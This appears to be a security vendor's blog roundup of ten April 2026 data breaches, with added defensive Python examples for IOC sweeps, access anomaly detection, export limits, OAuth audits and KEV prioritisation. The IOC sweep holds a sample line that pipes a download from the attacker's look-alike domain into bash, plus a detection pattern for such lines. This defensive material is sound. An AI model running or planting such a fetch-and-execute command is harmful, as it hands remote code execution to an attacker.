
Top 10 Data Breaches of April 2026

Shubham Jha · May 1, 2026 · 15 min read

What if the biggest security risk in your organization right now is your own security tools? In April 2026, that stopped being a thought experiment. Attackers trojanized the vulnerability scanners running inside enterprise CI/CD pipelines, compromised the password manager trusted by over 50,000 businesses, and pivoted through a cloud analytics platform into a dozen corporate Snowflake environments at once. Across the ten biggest data breaches of April 2026, more than 50 million records were exposed or stolen. Most of it happened in environments that already had security tools deployed. Here is the uncomfortable pattern connecting all of it, and what your security program needs to do differently.

April 2026 Top Data Breaches at a glance

1. Checkmarx + Bitwarden CLI: When Your Security Scanner Becomes the Weapon

Date: April 22, 2026  ·  Type: CI/CD supply chain poisoning  ·  Actor: TeamPCP / Shai-Hulud

This is the breach that should keep every AppSec and DevSecOps team awake, because it turned the tool that is supposed to find problems into the problem. Attackers trojanized Checkmarx KICS, an infrastructure-as-code security scanner embedded in CI/CD pipelines across thousands of organizations, publishing poisoned builds to Docker Hub, VS Code extensions, and GitHub Actions at the same time. Hours later, the Bitwarden CLI npm package (@bitwarden/cli@2026.4.0) was also poisoned for approximately 90 minutes, harvesting GitHub personal access tokens, npm tokens, SSH keys, AWS/Azure/GCP credentials, and even AI tool configurations for Claude, Cursor, and Aider.

The stolen data was encrypted with AES-256-GCM and exfiltrated to a domain impersonating Checkmarx (audit.checkmarx[.]cx). If GitHub tokens were found, the malware weaponized them to inject malicious Actions workflows into victim repositories, cascading the attack downstream. The payload also achieved shell persistence via ~/.bashrc and ~/.zshrc modifications. Because the secrets are encrypted before they leave the host, content inspection at the egress point sees nothing useful; the detectable signals are the look-alike destination domain, an outbound connection from a build runner that has no business making one, and the new lines in the shell rc files.
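A post-incident sweep for the two indicators named above, written as an added example (not code from the original post, from Bitwarden or from Checkmarx): it looks for the poisoned @bitwarden/cli version in npm lockfiles and for the exfiltration domain or a curl/wget-to-shell line in the shell rc files the payload modified. The indicator values come from the write-up; the function names, the "some-wrapper" package name and the sample inputs are this example's own constructions.

```python
"""Sweep for indicators of the Checkmarx KICS / Bitwarden CLI campaign.

Added example (not the post's, Bitwarden's or Checkmarx's code). Looks for
(1) the poisoned @bitwarden/cli version in package-lock.json files and
(2) rc-file lines that reference the exfil domain or pipe remote content
into a shell, the persistence the write-up describes.
"""
import json
import re
from pathlib import Path

POISONED_PACKAGES = {"@bitwarden/cli": {"2026.4.0"}}  # from the incident reporting
IOC_DOMAIN = "audit.checkmarx.cx"                     # written defanged in the text
RC_FILES = (".bashrc", ".zshrc", ".profile", ".zprofile")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")


def find_poisoned_packages(lock_text: str) -> list:
    """Return sorted (name, version) pairs in a package-lock.json matching a known-bad version.

    Handles lockfileVersion 2/3 (top-level "packages" keyed by install path)
    and the older v1 layout ("dependencies", nested).
    """
    lock = json.loads(lock_text)
    hits = set()

    for path, meta in lock.get("packages", {}).items():
        if not path:                       # "" is the root project entry
            continue
        name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
        if meta.get("version") in POISONED_PACKAGES.get(name, ()):
            hits.add((name, meta["version"]))

    def walk(deps: dict) -> None:
        for name, meta in deps.items():
            if meta.get("version") in POISONED_PACKAGES.get(name, ()):
                hits.add((name, meta["version"]))
            walk(meta.get("dependencies", {}))

    walk(lock.get("dependencies", {}))
    return sorted(hits)


def find_rc_persistence(rc_text: str) -> list:
    """Return rc-file lines that name the exfil domain or pipe curl/wget output into a shell."""
    return [
        line.strip()
        for line in rc_text.splitlines()
        if IOC_DOMAIN in line or PIPE_TO_SHELL.search(line)
    ]


def scan_tree(root: Path, home: Path) -> dict:
    """Walk a checkout for lockfiles and a home directory for rc files; return a report."""
    report = {"packages": [], "persistence": []}
    for lock in root.rglob("package-lock.json"):
        for name, ver in find_poisoned_packages(lock.read_text()):
            report["packages"].append((str(lock), name, ver))
    for rc in RC_FILES:
        p = home / rc
        if p.is_file():
            for line in find_rc_persistence(p.read_text(errors="replace")):
                report["persistence"].append((str(p), line))
    return report


# Constructed sample inputs; not real artefacts from the incident.
SAMPLE_LOCK_V3 = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "ci-tools", "version": "1.0.0"},
        "node_modules/@bitwarden/cli": {"version": "2026.4.0"},
        "node_modules/left-pad": {"version": "1.3.0"},
    },
})
SAMPLE_LOCK_V1 = json.dumps({
    "lockfileVersion": 1,
    "dependencies": {
        "some-wrapper": {"version": "0.1.0",
                         "dependencies": {"@bitwarden/cli": {"version": "2026.4.0"}}},
    },
})
SAMPLE_RC = "export PATH=$HOME/bin:$PATH\ncurl -s https://audit.checkmarx.cx/x | bash\n"

if __name__ == "__main__":
    print(find_poisoned_packages(SAMPLE_LOCK_V3))
    print(find_rc_persistence(SAMPLE_RC))
    print(scan_tree(Path("."), Path.home()))
```

Run it from the root of a monorepo checkout and point `home` at each CI runner user; a hit in `packages` means the lockfile resolved the bad version and every secret that runner could reach should be treated as exposed, whether or not the rc sweep finds anything.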

This attack followed TeamPCP's earlier March 2026 compromise of Aqua Security's Trivy vulnerability scanner, the initial foothold that gave attackers CI/CD secrets to pivot into Checkmarx, LiteLLM, and Telnyx. The Vect ransomware group partnered with TeamPCP and listed its first public victim on April 15, a property management firm with 700 GB stolen.

Attackers are deliberately targeting the tools developers trust most: security scanners, password managers, and high-privilege software embedded in build pipelines. These tools are over-permissioned by design and rarely monitored for anomalous behavior. The mitigations are unglamorous: pin actions, images, and packages to immutable digests or exact versions rather than floating tags, wait out a cooling-off period before adopting a fresh release (the poisoned Bitwarden version was live for only about 90 minutes), hand pipeline jobs short-lived, scoped credentials instead of long-lived personal access tokens, and restrict outbound traffic from build runners to an allowlist so that a connection to a look-alike domain is blocked rather than tolerated. Strobes' ASPM continuously maps CI/CD-integrated tools as first-class attack surface assets, flagging over-privileged pipeline dependencies before they become exfiltration vectors.

Scale: 50K+ businesses at risk  ·  4 security/dev tools compromised  ·  CI/CD secrets stolen at scale
Sources: The Hacker News · Sophos · The Register · SecurityWeek · Socket.dev · Bitwarden Community

2. Anodot + Rockstar Games: Third-Party Cloud Access Abuse

Date: April 4-11, 2026  ·  Type: Third-party cloud access abuse  ·  Actor: ShinyHunters

On April 4, Anodot, an AI-powered cloud analytics and anomaly detection platform, reported service outages affecting its connectors for Snowflake, Amazon S3, and Amazon Kinesis. What wasn't disclosed at the time was that the outages coincided with the theft of authentication tokens Anodot held for its customers' cloud environments.

ShinyHunters used those tokens to gain what appeared to be legitimate access to Rockstar Games' Snowflake data warehouse, executing standard database query operations that blended with normal analytical workloads to evade detection. By April 11, ShinyHunters posted a ransom ultimatum for Rockstar: "Pay or leak by April 14." Rockstar confirmed the breach and described the stolen data as "limited, non-material company information." At least a dozen other Anodot customers faced the same exposure, none of whom had visibility into the inherited risk.

This mirrors ShinyHunters' devastating 2024 Snowflake campaign that hit Ticketmaster (560 million records), AT&T (110 million records), and Santander Bank (30 million customers) through the same pattern. Supply chain attacks that exploit trusted third-party access are the defining threat of 2026, and they are only getting harder to detect.

Anodot had authenticated, legitimate access to hundreds of Snowflake environments, and every one of those organizations had a blind spot it did not know about: a trusted third party holds the keys, and the downstream victim never sees the breach coming. Third-party platforms that hold OAuth tokens or cloud credentials to your environment are an extension of your attack surface. For a vendor integration like this, the controls that make the difference are a Snowflake network policy that binds the vendor's service user to the vendor's published egress addresses, credentials scoped to that one role and rotated on a schedule, and a standing query over ACCOUNT_USAGE.LOGIN_HISTORY (source IPs) and QUERY_HISTORY (volume) for that role, so that "standard" queries from an unfamiliar place stand out. Strobes' Attack Surface Management continuously discovers and monitors these inherited access paths.

Scale: 12+ downstream companies compromised  ·  Standard cloud queries used to evade detection
Sources: TechCrunch · BleepingComputer · The Register

3. McGraw-Hill: 13.5M Records from a Misconfigured Salesforce Endpoint (DIVD-2026-00005)

Date: April 14, 2026  ·  Type: SaaS misconfiguration  ·  Actor: ShinyHunters

The McGraw-Hill Salesforce data breach is one of the clearest examples of what happens when SaaS configuration management is treated as a one-time task rather than a continuous process. After a ransom deadline expired, ShinyHunters dumped over 100 GB of data publicly. The root cause: a Salesforce Experience Cloud misconfiguration where guest user profiles had been granted excessive permissions, leaving the /s/sfsites/aura endpoint unauthenticated and queryable. No exploit. No zero-day. Just a misconfigured SaaS environment that automated scanners can and should catch.

The Dutch Institute for Vulnerability Disclosure issued advisory DIVD-2026-00005 in April, confirming this is not a McGraw-Hill-specific issue. It is a systemic Salesforce Experience Cloud misconfiguration affecting any organization that hasn't properly locked down guest user permissions and Aura component access. DIVD is conducting large-scale scanning to notify affected organizations.

Have I Been Pwned confirmed 13.5 million unique email addresses in the leaked data, alongside names, phone numbers, and physical addresses, a significant spear-phishing risk for McGraw-Hill's global student and educator base.

This is one of the most instructive Salesforce data breaches of April 2026 precisely because it was so ordinary: ShinyHunters used mass-scanning scripts to find exposed Aura endpoints, the same probe any attack surface management tool runs continuously. The defender-side check is just as mechanical: review each Experience Cloud site's guest user profile for object and field permissions it does not need, confirm the secure guest user record access setting is enabled, and verify that no Apex class or Aura component reachable by the guest profile returns records. Strobes' ASPM surfaces publicly accessible SaaS resources with excessive guest permissions before attackers scan for them first.

Scale: 13.5M accounts confirmed (HIBP)  ·  100+ GB dumped  ·  Industry-wide issue (DIVD-2026-00005)
Sources: BleepingComputer · The Register · The Record (Recorded Future) · DIVD CSIRT · Have I Been Pwned · Security Magazine

4. ADT: Vishing Compromises Okta SSO, Opens Salesforce to Mass Exfiltration

Date: April 20, 2026  ·  Type: Identity-based attack (vishing + SSO compromise)  ·  Actor: ShinyHunters

The ADT Salesforce data breach started not with a vulnerability but with a phone call. ShinyHunters used voice phishing (vishing) to compromise a single employee's Okta SSO account and gain access to ADT's Salesforce environment. No exploit. No vulnerability. One impersonated IT support call, one compromised identity, full Salesforce access. ADT detected the intrusion on April 20, terminated access, and launched an investigation, but ShinyHunters had already exfiltrated the data and dumped an 11 GB archive publicly after ADT refused to pay the ransom.

Have I Been Pwned analyzed the leak and confirmed 5.5 million affected individuals: names, phone numbers, addresses, and in some cases dates of birth and partial Social Security numbers. This is ADT's third data breach in two years; the prior incidents were in August and October 2024. ShinyHunters' 2026 campaign runs almost entirely on vishing attacks targeting Okta, Microsoft Entra, and Google SSO accounts to gain SaaS footholds across enterprises and BPO providers.

A single SSO account without anomalous access detection opened an entire Salesforce environment. In April 2026's extortion campaigns, identity is consistently the entry point, not a vulnerability in the traditional sense, which means the countermeasures are identity controls too: phishing-resistant MFA (FIDO2/WebAuthn), since a caller cannot be talked into reading out a hardware key, a help-desk reset procedure that verifies the caller over a second channel before any factor is reset, and alerting on bulk report exports or API reads from a session that was established only minutes earlier. Strobes' security program validates whether access paths to critical SaaS environments are properly gated and flags over-permissioned identities before attackers weaponize them.
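The detection both the Anodot/Snowflake case (a vendor service identity whose "normal" queries suddenly read far more than usual, from somewhere new) and the ADT case (one SSO-backed user exporting a CRM in bulk) call for is the same per-identity baseline, shown here as an added example that is not code from the original post. The events are a constructed stand-in for Snowflake ACCOUNT_USAGE rows or Salesforce event log records; the field names, identities, IPs and thresholds are this example's own.

```python
"""Bulk-read anomaly detection over data-access audit events.

Added example, not the post's code. Each identity is compared only with its
own recent history, so a vendor connector that always reads 50k rows/day is
judged against 50k, and an analyst who always reads 5k is judged against 5k.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import date, timedelta
from statistics import median


@dataclass(frozen=True)
class AccessEvent:
    identity: str     # user, service account or OAuth integration
    day: date
    source_ip: str
    rows_read: int


def detect_bulk_reads(events, baseline_days=14, spike_factor=5.0, min_rows=10_000):
    """Flag identities whose most recent day of activity is anomalous.

    An identity is reported when, compared with its own preceding baseline_days:
      * it read more than spike_factor times its median daily row count
        (and at least min_rows, to ignore noisy low-volume accounts), or
      * its reads came from a source IP never seen for it in the baseline.
    Median rather than mean, so one earlier burst does not mask the next one.
    Identities with no history yet are skipped rather than flagged.
    """
    rows_by_day = defaultdict(lambda: defaultdict(int))
    ips_by_day = defaultdict(lambda: defaultdict(set))
    for e in events:
        rows_by_day[e.identity][e.day] += e.rows_read
        ips_by_day[e.identity][e.day].add(e.source_ip)

    findings = []
    for ident, per_day in rows_by_day.items():
        days = sorted(per_day)
        latest = days[-1]
        history = [d for d in days[:-1] if (latest - d).days <= baseline_days]
        if not history:
            continue
        baseline = median(per_day[d] for d in history)
        today = per_day[latest]
        known_ips = set().union(*(ips_by_day[ident][d] for d in history))
        new_ips = ips_by_day[ident][latest] - known_ips

        reasons = []
        if today >= min_rows and today > spike_factor * max(baseline, 1):
            reasons.append(f"read {today} rows vs median {baseline:.0f}")
        if new_ips:
            reasons.append("new source ip(s): " + ", ".join(sorted(new_ips)))
        if reasons:
            findings.append({"identity": ident, "day": latest, "reasons": reasons})
    return findings


def _constructed_events():
    """Constructed sample: 14 quiet days, then one identity reads 40x from a new IP."""
    start = date(2026, 4, 1)
    ev = []
    for i in range(14):
        d = start + timedelta(days=i)
        ev.append(AccessEvent("anodot_connector", d, "203.0.113.10", 50_000))
        ev.append(AccessEvent("analyst.jane", d, "198.51.100.20", 5_000))
    last = start + timedelta(days=14)
    ev.append(AccessEvent("anodot_connector", last, "192.0.2.77", 2_000_000))
    ev.append(AccessEvent("analyst.jane", last, "198.51.100.20", 6_000))
    return ev


SAMPLE_EVENTS = _constructed_events()

if __name__ == "__main__":
    for finding in detect_bulk_reads(SAMPLE_EVENTS):
        print(finding)
```

Feed it one day of events at a time from your warehouse or CRM audit log and page on any finding for a service identity; for human users, the "new source IP" reason on its own is the cheap early signal that a session was established from somewhere the vishing victim has never worked.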

Scale: 5.5M confirmed (HIBP)  ·  10M+ claimed  ·  11 GB archive leaked
Sources: BleepingComputer · Have I Been Pwned · The Register · CybersecurityNews · Tom's Guide

5. Citizens Bank + Frost Bank: One Vendor, Two $50B+ Banks Breached Simultaneously

Date: April 20, 2026  ·  Type: Third-party vendor compromise + ransomware double-extortion  ·  Actor: Everest RaaS

The Everest ransomware-as-a-service operation posted both Citizens Financial Group ($227.9 billion in assets, 1,000+ branches across 14 states) and Frost Bank ($53 billion in assets, 200+ Texas locations) on its dark web extortion site on the same day, April 20, with a six-day payment deadline. ZeroFox's analysis, shared with American Banker, confirmed the two breaches shared a single point of failure: one compromised third-party vendor, evidenced by matching document-production metadata across both banks' leaked data samples.

Everest claimed 3.4 million records from Citizens and over 250,000 Social Security numbers and TINs from Frost. Both banks confirmed the breach originated from a vendor, not from direct unauthorized access to their own networks. Multiple federal class-action lawsuits were filed in Rhode Island courts within days of disclosure.

One vendor, two of America's largest banks exposed simultaneously. Shared vendors create shared, invisible risk, and it is one of the most underestimated exposure patterns in financial services. Strobes' ASM maps vendor exposure paths and flags unmonitored third-party ingress points before ransomware groups like Everest find the same shared access first.

Scale: 3.4M + 250K SSNs claimed  ·  380+ GB total  ·  Federal class-action lawsuits filed
Sources: American Banker · Cybernews · PYMNTS · Morningstar/PR Newswire · SC Media

6. Adobe (Alleged): BPO Supply Chain Exposes 13M Support Tickets and Bug Bounty Data

Date: Early April 2026  ·  Type: Third-party BPO compromise + ticketing misconfiguration  ·  Actor: "Mr. Raccoon" (unconfirmed by Adobe)

Threat actor "Mr. Raccoon" claimed a breach of Adobe via an Indian BPO firm contracted for customer support. The claimed chain ran: a phishing email, a RAT deployed on a BPO employee's machine, a spear-phish from that foothold to the employee's manager, and from the manager's access into Adobe's support ticketing environment. The most alarming detail was an architectural failure: the ticketing platform apparently allowed any agent to export all tickets in a single bulk request, with no rate limits, no volume alerts, and no approval workflow required.
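The three missing controls named above, a per-request cap, a per-agent daily budget with step-up approval beyond it, and an audit record with a volume alert for every attempt, as an added example that is not Adobe's code or any ticketing vendor's. The class, field and threshold names are this example's own; the `demo()` run at the bottom is a constructed sequence, not an observed one.

```python
"""Gating a bulk ticket-export action so one agent cannot pull the whole store.

Added example, not a vendor's code. Every attempt, allowed or denied, lands in
the audit log with an alert flag, because a denied request for 50k tickets is
itself the signal a SOC wants.
"""
from dataclasses import dataclass, field
from datetime import date

PER_REQUEST_CAP = 500        # max tickets one export call may return
DAILY_BUDGET = 2_000         # per agent, per day, without approval
HARD_CEILING = 50_000        # per agent, per day, even with approval
ALERT_FRACTION = 0.8         # raise a volume alert at 80% of the daily budget


@dataclass
class ExportGate:
    usage: dict = field(default_factory=dict)      # (agent, day) -> tickets exported so far
    approvals: set = field(default_factory=set)    # one-time approval ids issued out of band
    audit_log: list = field(default_factory=list)  # every decision, for the SOC

    def grant_approval(self, approval_id: str) -> None:
        """Called by the approval workflow (a manager's click), never by the agent."""
        self.approvals.add(approval_id)

    def request_export(self, agent: str, requested: int, today: date,
                       approval_id: str = "") -> dict:
        used = self.usage.get((agent, today), 0)
        total = used + requested
        decision = {"agent": agent, "day": today.isoformat(), "requested": requested,
                    "used_before": used, "allowed": False, "reason": "", "alert": False}

        if requested > PER_REQUEST_CAP:
            decision["reason"] = f"page size {requested} exceeds cap {PER_REQUEST_CAP}"
        elif total > HARD_CEILING:
            decision["reason"] = "daily hard ceiling reached; no approval can override"
        elif total > DAILY_BUDGET and approval_id not in self.approvals:
            decision["reason"] = "daily budget exhausted; manager approval required"
        else:
            decision["allowed"] = True
            self.usage[(agent, today)] = total
            if total > DAILY_BUDGET:
                self.approvals.discard(approval_id)   # approvals are single-use
                decision["reason"] = f"over budget, approved via {approval_id}"

        # Alert on the attempt, not only on success.
        decision["alert"] = total > DAILY_BUDGET * ALERT_FRACTION
        self.audit_log.append(decision)
        return decision


def demo() -> list:
    """Constructed run: four 500-ticket pages, a fifth that trips the budget,
    an over-cap page, then the fifth page again with a manager approval."""
    gate = ExportGate()
    today = date(2026, 4, 1)
    out = [gate.request_export("agent-17", 500, today) for _ in range(5)]
    out.append(gate.request_export("agent-17", 501, today))
    gate.grant_approval("APR-0001")
    out.append(gate.request_export("agent-17", 500, today, approval_id="APR-0001"))
    return out


if __name__ == "__main__":
    for d in demo():
        print(d)
```

The numbers are the easy part to tune; the design point is that the budget is enforced per agent per day on the server, that approvals are issued by someone other than the requester and consumed once, and that the hard ceiling exists so that a compromised manager cannot approve the whole ticket store either.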

The alleged stolen cache includes 13 million customer support tickets, 15,000 employee records, and, critically, all of Adobe's HackerOne bug bounty submissions. If the HackerOne data is real, it contains step-by-step vulnerability disclosures for issues that may remain unpatched, handing attackers a ready-made exploitation roadmap. Adobe has not confirmed or denied the incident. Vx-underground researchers described the claimed compromise as appearing "legitimate."

Two failures drove this breach: unchecked BPO vendor access and an application-level misconfiguration that permitted unlimited bulk data export without triggering any controls. Strobes' ASPM surfaces over-permissioned application configurations, including third-party support systems, that allow mass exfiltration without generating a single alert.

Scale: 13M support tickets alleged  ·  15K employee records  ·  HackerOne bug submissions at risk
Sources: Cybernews · SC Media · CybersecurityNews · CyberPress

7. Medtronic: ShinyHunters Claims 9M+ Records from the World's Largest Medical Device Maker

Date: Late April 2026  ·  Type: Corporate IT network breach  ·  Actor: ShinyHunters

Medtronic, the world's largest medical device manufacturer, confirmed unauthorized access to its corporate IT systems in an SEC Form 8-K filing, stating that no products, manufacturing operations, or patient safety were affected. ShinyHunters claimed theft of over 9 million records and listed the company on its dark web extortion site; the listing was later removed. Medtronic engaged external cybersecurity experts and notified federal law enforcement.

This came weeks after Iran-linked hacktivist group Handala's March 2026 wiper attack on rival Stryker, where employees reportedly watched their systems being wiped in real time. Healthcare device infrastructure has emerged as a clear and sustained 2026 threat theme, with geopolitical and financially motivated actors both targeting the sector in the same quarter.

A confirmed SEC-disclosed breach with 9M+ records claimed is a failure of both attack surface visibility and regulatory readiness. Medtronic has not said how the attackers got in, and that is the practical point for regulated environments: when the access path is unknown until after the fact, continuous monitoring across the full attack surface matters more than point-in-time assessments, because an annual pentest is unlikely to have been looking at the right place at the right time.

Scale: 9M+ records claimed  ·  SEC Form 8-K filed  ·  No operational or patient impact confirmed
Sources: BleepingComputer · TechRadar · Security Affairs · MedTech Dive · HIPAA Journal

8. Vercel: One "Allow All" OAuth Grant Enables Full Internal Access via Compromised AI Tool

Date: Mid-April 2026  ·  Type: Over-permissioned AI integration  ·  Actor: Unknown

Vercel confirmed a security incident after threat actors claimed to have breached its internal systems via a compromised AI tool, Context.ai, that a single employee had connected with "Allow All" OAuth permissions. Using the compromised tool as an entry point, attackers accessed internal systems and claimed to be selling the stolen data for $2 million.

This breach highlights an attack surface class that is growing faster than most inventories: enterprise AI tool integrations. As organizations rush to connect AI coding assistants, analytics tools, and workflow automation to their cloud environments, each OAuth connection with excessive permissions creates an unmonitored entry point, and a compromise of the tool becomes a compromise of everything its token can reach. "Allow All" is the new misconfigured S3 bucket, and most organizations have no inventory of which AI tools their employees have connected, at what permission level, or to which systems.

AI tool integrations are shadow IT at machine speed. The Vercel breach is a direct consequence of unmanaged OAuth grant sprawl, one of the fastest-growing exposure classes in 2026. If your security program does not maintain a live inventory of which AI and SaaS tools hold elevated access to your cloud environments, you have a blind spot that attackers are actively scanning for. The identity providers already offer the lever: Microsoft Entra ID's admin consent workflow and Google Workspace's third-party app access controls both let you block user self-consent for broad scopes and route those requests to a reviewer, so "Allow All" becomes a ticket rather than a click. Strobes' Attack Surface Management continuously discovers and assesses these integrations.
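What a first pass over such an inventory looks like, as an added example that is not code from Vercel or from any identity provider. Scope vocabularies differ by provider, so the broad-scope patterns, the field names, the approved-app list and the sample grants are this example's own assumptions; a bare "*" scope stands in for the "Allow All"-style grant the write-up describes.

```python
"""Ranking third-party OAuth grants by blast radius, approval status and staleness.

Added example, not a vendor's code. The point is the shape of the review:
every grant scored by the broadest scope it holds, then by whether the app was
ever approved, then by whether anyone still uses it.
"""
from dataclasses import dataclass
from datetime import date

WRITE_LIKE_MARKERS = ("admin", "write", "full", "delete", "manage", "repo")  # assumed vocabulary
STALE_AFTER_DAYS = 30
AS_OF = date(2026, 4, 30)  # constructed review date


@dataclass(frozen=True)
class Grant:
    app: str
    user: str
    scopes: tuple     # scopes as the provider reports them
    last_used: date


def scope_risk(scope: str) -> int:
    """2 = wildcard / allow-all, 1 = write- or admin-like, 0 = narrow or read-only."""
    s = scope.lower()
    if s in ("*", "allow_all", "all") or s.endswith("/*") or s.endswith(".all"):
        return 2
    return 1 if any(m in s for m in WRITE_LIKE_MARKERS) else 0


def audit_grants(grants, approved_apps, today=AS_OF) -> list:
    """Return findings sorted highest-risk first; grants with no issue are omitted."""
    findings = []
    for g in grants:
        worst = max((scope_risk(s) for s in g.scopes), default=0)
        idle_days = (today - g.last_used).days
        unapproved = g.app not in approved_apps
        stale = idle_days > STALE_AFTER_DAYS
        issues = []
        if worst == 2:
            issues.append("wildcard / allow-all scope")
        elif worst == 1:
            broad = ", ".join(s for s in g.scopes if scope_risk(s) == 1)
            issues.append("write or admin scope: " + broad)
        if unapproved:
            issues.append("app never approved")
        if stale:
            issues.append(f"unused for {idle_days} days")
        if issues:
            score = worst * 2 + int(unapproved) + int(stale)
            findings.append({"app": g.app, "user": g.user, "score": score, "issues": issues})
    findings.sort(key=lambda f: (-f["score"], f["app"]))
    return findings


# Constructed inventory; only "context.ai" is a name taken from the write-up.
SAMPLE_GRANTS = [
    Grant("context.ai", "dev.alice", ("*",), date(2026, 4, 28)),
    Grant("ci-deploy-bot", "svc.ci", ("repo", "workflow"), date(2026, 4, 29)),
    Grant("calendar-sync", "dev.bob", ("calendar.readonly",), date(2026, 4, 29)),
    Grant("old-notes-app", "dev.carol", ("drive.readonly",), date(2026, 2, 1)),
]
APPROVED_APPS = {"ci-deploy-bot", "calendar-sync"}

if __name__ == "__main__":
    for finding in audit_grants(SAMPLE_GRANTS, APPROVED_APPS):
        print(finding)
```

Replace `SAMPLE_GRANTS` with an export from your identity provider's enterprise-app or connected-app report and adjust `WRITE_LIKE_MARKERS` to that provider's scope names; the ordering is what matters, since the wildcard grant to an unapproved tool is the one to revoke today.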

Scale: Stolen data listed for $2M  ·  Single OAuth grant opened full internal access
Sources: Privacy Guides · TechRadar · BleepingComputer

9. CISA KEV Alert: Ransomware Gangs Actively Exploiting 4 Microsoft CVEs, Including One from 2012

Date: April 13, 2026  ·  Type: Known exploited vulnerabilities  ·  Relevance: RBVM / patching urgency

Among the data breaches and vulnerability disclosures of April 2026, this CISA alert stands out. Four Microsoft CVEs were added to the Known Exploited Vulnerabilities catalog with an April 27 federal patching deadline, all confirmed as active ransomware attack vectors:

  • CVE-2025-60710: Windows link-following vulnerability, privilege escalation (patched December 2025)
  • CVE-2023-36424: Windows Common Log File System Driver, privilege escalation (patched November 2023)
  • CVE-2023-21529: Microsoft Exchange Server deserialization flaw, RCE for authenticated attackers; confirmed ransomware use (patched February 2023)
  • A fourth CVE patched over 14 years ago is still being actively exploited in the wild in 2026

CISA also added two Adobe Acrobat CVEs to the same KEV update. The Exchange Server RCE represents the clearest danger for enterprises still running unpatched on-premises deployments: it needs an authenticated attacker, but a compromised service account or a phished employee is enough, and the result is code execution on the mail server itself.

Four CVEs actively weaponized in ransomware attacks. One patched over a decade ago. Without live threat intelligence tied to your actual asset inventory, security teams have no way to know which of their thousands of unpatched CVEs are being exploited in active ransomware campaigns right now. Strobes' RBVM integrates CISA KEV data and real-world exploitation signals to surface which vulnerabilities in your environment demand immediate action, rather than CVSS scores that have not changed in years.
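The join the paragraph above describes, between an asset inventory and the KEV catalog with the ransomware flag pulled to the top, as an added example that is not Strobes' code. The feed URL and the JSON field names (cveID, dueDate, knownRansomwareCampaignUse) are CISA's published ones; the inventory format is this example's own, and `KEV_EXCERPT` is a constructed stand-in built from the three Microsoft CVEs listed above, not a download.

```python
"""Prioritising an asset inventory against the CISA KEV catalog.

Added example, not Strobes' code. load_kev() reads CISA's JSON feed (or a
supplied excerpt); prioritize() joins it to an inventory and orders the
result so KEV entries marked as used in ransomware campaigns come first,
then the closest CISA due dates.
"""
import json
import urllib.request
from datetime import date
from typing import Optional

KEV_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"
AS_OF = date(2026, 4, 13)  # the date of the KEV update discussed above

# Constructed excerpt using the CVEs and due date named in the post; not a real download.
KEV_EXCERPT = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2025-60710", "vendorProject": "Microsoft", "product": "Windows",
     "vulnerabilityName": "Windows link-following privilege escalation",
     "dateAdded": "2026-04-13", "dueDate": "2026-04-27", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2023-36424", "vendorProject": "Microsoft", "product": "Windows",
     "vulnerabilityName": "Common Log File System Driver privilege escalation",
     "dateAdded": "2026-04-13", "dueDate": "2026-04-27", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2023-21529", "vendorProject": "Microsoft", "product": "Exchange Server",
     "vulnerabilityName": "Exchange Server deserialization remote code execution",
     "dateAdded": "2026-04-13", "dueDate": "2026-04-27", "knownRansomwareCampaignUse": "Known"},
]})


def load_kev(text: Optional[str] = None) -> dict:
    """Return {cveID: entry}. With no text argument, fetch the live catalog from CISA."""
    if text is None:
        with urllib.request.urlopen(KEV_URL, timeout=30) as resp:
            text = resp.read().decode("utf-8")
    return {v["cveID"]: v for v in json.loads(text)["vulnerabilities"]}


def prioritize(inventory, kev: dict, today: date) -> list:
    """inventory: [{"host": ..., "cves": [...]}]; one finding per (host, CVE) present in KEV.

    Sort key: ransomware-used entries first, then fewest days to the CISA due
    date (negative means already overdue).
    """
    findings = []
    for asset in inventory:
        for cve in asset["cves"]:
            entry = kev.get(cve)
            if entry is None:
                continue
            due = date.fromisoformat(entry["dueDate"])
            findings.append({
                "host": asset["host"], "cve": cve, "product": entry["product"],
                "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
                "days_to_due": (due - today).days,
            })
    findings.sort(key=lambda f: (not f["ransomware"], f["days_to_due"]))
    return findings


# Constructed inventory with illustrative hostnames.
SAMPLE_INVENTORY = [
    {"host": "exch01.corp.example", "cves": ["CVE-2023-21529"]},
    {"host": "ws-0417.corp.example", "cves": ["CVE-2023-36424", "CVE-2025-60710"]},
    {"host": "web01.corp.example", "cves": []},
]

if __name__ == "__main__":
    kev = load_kev(KEV_EXCERPT)   # use load_kev() with no argument for the live feed
    for finding in prioritize(SAMPLE_INVENTORY, kev, AS_OF):
        print(finding)
```

Run it against the output of whatever produces your CVE-per-host list and the ordering replaces a CVSS sort: the Exchange entry lands at the top not because its score changed but because CISA says a ransomware crew is using it this month.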

Scale: 4 Microsoft + 2 Adobe CVEs added to KEV  ·  April 27 federal patching deadline
Sources: The Register · CISA KEV catalog

10. France Titres (ANTS): 19M National Identity Records Allegedly Stolen from a French Government Agency

Date: April 15, 2026  ·  Type: Unauthorized access to government identity infrastructure  ·  Actor: "breach3d"

France Titres, the government agency managing all French identity and registration documents, including national ID cards, driver's licenses, and passports, disclosed a breach detected on April 15. Threat actor "breach3d" claimed up to 19 million records stolen, including login IDs, full names, email addresses, dates of birth, account identifiers, and in some cases, postal addresses, places of birth, and phone numbers. France's data protection authority CNIL, the Paris Public Prosecutor, and national cybersecurity agency ANSSI are all involved in the investigation.

The agency confirmed the exposed data does not grant direct portal access, but the combination of national ID-linked personal data creates substantial social engineering and identity fraud risk at a scale affecting a significant portion of the French population.

For organizations operating under NIS2, GDPR, or DORA, this incident illustrates both the breach notification obligations and the regulatory exposure that follow an attack on identity infrastructure. The France Titres breach is a reminder that data breaches in 2026 increasingly target government and public-sector systems, where the compliance consequences compound the operational damage. Continuous monitoring of these environments is no longer a best practice under NIS2. It is a requirement.

Scale: Up to 19M records claimed  ·  National ID, driver's license, passport-linked data  ·  CNIL + ANSSI investigating
Sources: SC Media · Privacy Guides · SharkStriker

What April 2026 Is Really Telling Security Teams

